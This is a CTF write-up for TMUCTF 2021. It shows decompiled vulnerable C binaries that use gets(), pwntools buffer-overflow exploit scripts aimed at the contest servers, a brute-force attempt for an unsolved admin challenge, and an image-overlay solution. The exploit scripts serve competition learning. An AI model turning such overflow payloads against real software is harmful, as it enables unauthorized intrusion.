# TMUCTF 2021 ## Pwn ### Warmup \[50 pts] > **Description** > > Just a simple warmup! > > nc 194.5.207.56 7000, nc 185.239.107.54 7000 ```c int main() { char local_58 [76]; int local_c; setbuf(stdout,(char *)0x0); setbuf(stdin,(char *)0x0); setbuf(stderr,(char *)0x0); tmulogo(); puts("Welcome to TMUCTF 2021! Let us know your name: "); local_c = 0; gets(local_58); puts("Thanks!\n"); if (local_c != 0) { system("cat flag.txt"); } return 0; } ``` **Solution** This is the first thing you learn when opening a book for reverse engineering/pwn. A buffer overflow to access the flag. ```python from pwn import * payload = b"A" * 78 #binary = process("./warmup") binary = remote("194.5.207.56", 7000) print(binary.recvuntil(bytes("name:", "utf-8"))) binary.sendline(payload) binary.interactive() ``` **Flag: TMUCTF{??????}** ### Baby Pwn \[50 pts] > **Description** > > Can you get the flag? > > nc 194.5.207.56 7010, nc 185.239.107.54 7010 **Decompiled Code** ```c int main(void) { char name [28]; int local_c; setbuf(stdout,(char *)0x0); setbuf(stderr,(char *)0x0); setbuf(stdin,(char *)0x0); tmulogo(); local_c = 0; puts("Hi, Please enter your name: "); gets(name); if (local_c == 0xcafe) { helloUser(name); } return 0; } ``` ```c void helloUser(undefined8 param_1) { char local_88 [128]; printf("Nice to meet you %s!\n",param_1); puts("Tell me about yourself ;;)"); gets(local_88); puts("It was a pleasure meeting you."); return; } ``` \ **Solution** This is a common warmup problem that appears in CTF so I went through it easily. Well sort of. I grabbed some past code and found in the source what I am doing. I did everything right except it wasn't printing out the flag. Later on, another member looked over it and found that my address was completely wrong and that was a simple fix was all it took. The Code is below. ```python from pwn import * import time addr1 = 0xcafe flag_os = 0x4012f0 payload = b"A" * 28 payload2 = b"A" * 128 newline = bytes('\n', 'utf-8') #binary = process("./babypwn") binary = remote('194.5.207.56', 7010) print(binary.recvuntil(bytes("name:", "utf-8"))) binary.sendline(payload + p64(addr1)) # Makes it to Hello User print(binary.recvuntil(bytes(")", "utf-8"))) # Get to here binary.sendline(payload2 + p64(flag_os) + p64(flag_os)) binary.interactive() ``` **Flag: TMUCTF{??????}** ### Are you admin \[198 pts] \[Not Solved] > **Description** > > Just admin can get the flag! Note that the admin likes integers! > > nc 194.5.207.113 7020, nc 185.97.117.19 7020 ```c int main(void) { int iVar1; char local_128 [128]; char password [64]; char user [64]; FILE *local_28; int num1; int num2; int num3; int num4; int num5; setbuf(stdout,(char *)0x0); setbuf(stderr,(char *)0x0); setbuf(stdin,(char *)0x0); tmulogo(); num5 = 0; num4 = 0; num3 = 0; num2 = 0; num1 = 0; puts("Enter username:"); gets(user); puts("Enter password:"); gets(password); iVar1 = strcmp(user,"AlexTheUser"); if ((((iVar1 == 0) && (iVar1 = strcmp(password,"4l3x7h3p455w0rd"), iVar1 == 0)) && (num3 + num5 * num4 == 0x253f)) && (((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) && ((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) { local_28 = fopen("flag.txt","r"); if (local_28 == (FILE *)0x0) { printf("Missing flag.txt. Contact an admin if you see this on remote."); /* WARNING: Subroutine does not return */ exit(1); } fgets(local_128,0x80,local_28); printf("%s",local_128); } return 0; } ``` **Solution** ```python from pwn import * user = bytes("AlexTheUser", "utf-8") password = bytes("4l3x7h3p455w0rd", "utf-8") #print(len(p64(flag_address))) #binary = process("./areyouadmin") #binary.close() binary = remote("194.5.207.113", 7020) print(binary.recvuntil(bytes("username:", "utf-8"))) binary.sendline(user) print(binary.recvuntil(bytes("password:", "utf-8"))) binary.sendline(password) #binary.sendline(payload + p64(flag_address)) #binary.interactive() binary.close() print("made it to the numbers") """ top = 233 found = False i1 = 0 i4 = 0 i5 = 0 while not found: for i2 in range(100, top): for i3 in range(100, top): i1 = (-1 * i3 * i2) + 0x16d3 i4 = (0x37a2 - i2) / i3 # Using New Known i5 = (0x253f - i3) / i4 if (i5 + i2 * i1) == 0x1bc9: print(i1, i2, i3, i4, i5) if (i4 + i1 * i5) == 0x703f: print(i1, i2, i3, i4, i5) """ # 233 30 187 76 123 """ if (((num3 + num5 * num4 == 0x253f)) && (((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) && ((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) { """ """ top = 100 for i1 in range(0 , 100): print(i1) for i2 in range(0 , 10000): for i3 in range(28, 32): for i4 in range(90, 100): for i5 in range(90, 100): if (i3 + i5 * i4 == 9535): if(i2 + i4 * i3 == 14242): print(i2, i3, i4) if(i1 + i3 * i2 == 5843): if (i5 + i2 * i1 == 7113): if (i4 + i1 * i5 == 28735): print(i1, i2, i3, i4, i5) """ # Original Guess = 9535 14242 5843 7113 28735 #num1 + num3 * num2 == 0x16d3 #num3 + num5 * num4 == 0x253f #num2 + num4 * num3 == 0x37a2 #num5 + num2 * num1 == 0x1bc9 #num4 + num1 * num5 == 0x703f ``` ## Welcome ### Warmup \[50 pts] > **Description** > > A fun visual cryptography tool will amaze your kids! > > Note: Remember the flag format is TMUCTF{...}. {% file src="/files/-Mjl2EkN0KSwgWFemCVN" %} Image1 {% endfile %} {% file src="/files/-Mjl2Z5yMCcgNviNEtS8" %} Image2 {% endfile %} **Solution** Notice a small difference in the two file sizes. I was like hmmm let me see what would happen if I combine the images. I overlayed one on top of the other one and got the final image of the flag. ![](/files/-Mjl2H9ZTzdh3bCXyBBc) **Flag: TMUCTF{W3\_h0p3\_y0u\_3nj0y\_7h15\_c0mp371710n\_4nd\_7h4nk\_y0u!}** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://codingmace.gitbook.io/masterward/ctf/2021/tmuctf.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.